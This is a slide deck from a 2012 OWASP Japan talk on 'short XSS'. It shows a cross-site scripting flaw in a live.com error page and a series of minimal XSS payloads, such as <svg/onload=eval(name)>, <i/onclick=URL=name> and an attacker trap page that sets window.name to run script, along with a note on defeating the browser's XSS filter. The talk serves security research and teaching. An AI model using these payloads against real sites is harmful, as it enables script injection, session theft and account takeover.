3.7K Views
June 27, 12
スライド概要
OWSP Japan 2nd Local Chapter Meeting資料
Short talk of XSS 短いXSSの話 Jun 27 2012 Yosuke HASEGAWA OWASP Japan 2nd local chapter meeting
What!?
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />
XSS caused by error message
Microsoft “live.com” Over https Needless error message Interesting but not really matter now
alert is common knowledge for XSSers
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />
22 letters max.
XSS under 22 letters is too hard ><h1>XSSed</h1><!-- … 19 letters ><script>alert(1)</script> … 26 letters ><script>eval(name)</script> … 28 letters
by Gareth Heyes
XSS Golf by Gareth Heyes
Shortest XSS Challanges 19 letters <x/x=&{eval(name)}; // @0x6D6172696F Netscape 4 22 letters <svg/onload=eval(name) // @0x6D6172696F
https://*.live.com/?param=><h1>XSSed</h1><!-<!-- Version: "13.000.20177.00" Server:
BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 -->
<input type="hidden" value="MESSAGE: A
potentially dangerous Request.QueryString value
was detected from the client
><h1>XSSed</h1><!-(param="><h1>XSSed</h1><!--").
SOURCE: System.Web FORM:" />
22 letters max.
IE has “URL” property ><i/onclick=URL=name> … 21 letters Mario Heiderich’s work // Trap page created by attacker <iframe src="target" name="javascript:alert(1)"> // or use window.open from JavaScript
Did it! XSS Filter is disabled
Variations 20 letters <input type=hidden value=><i/onclick=URL=name> 22 letters <input type=hidden value=""><i/onclick=URL=name>"> 17 letters <input type=text value= onclick=URL=name> Run arbitrary code in 22 letters
Shortest JavaScript to run arbitrary code 10 letters eval(name) 9 letters eval(URL) 8 letters URL=name 6 letters $(URL)
Question? [email protected] [email protected] @hasegawayosuke http://utf-8.jp/ OWASP Japan 2nd local chapter meeting NetAgent http://www.netagent.co.jp/